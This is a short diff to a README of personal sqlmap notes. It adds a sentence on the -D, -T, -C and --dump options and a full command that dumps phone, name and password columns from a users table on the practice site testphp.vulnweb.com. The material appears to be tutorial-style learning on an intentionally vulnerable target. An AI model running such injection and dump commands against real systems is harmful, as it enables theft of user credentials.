vitaly-los/sqlmap/README.md

 Specify the database using –D, table using – T and columns using –columns:
 > sqlmap -u 'url' -D db_name -T table_name –columns

+As usual, use –D for database, -T for table, -C for column and –dump for data.
+The final command to fetch data will appear as shownbelow:

+> sqlmap -u 'http://testphp.vulnweb.com/listproducts.php?cat=1' -D acuart -T users -C phone,name,pass --dump

 All options on sqlmap page
 https://github.com/sqlmapproject/sqlmap/wiki/Usage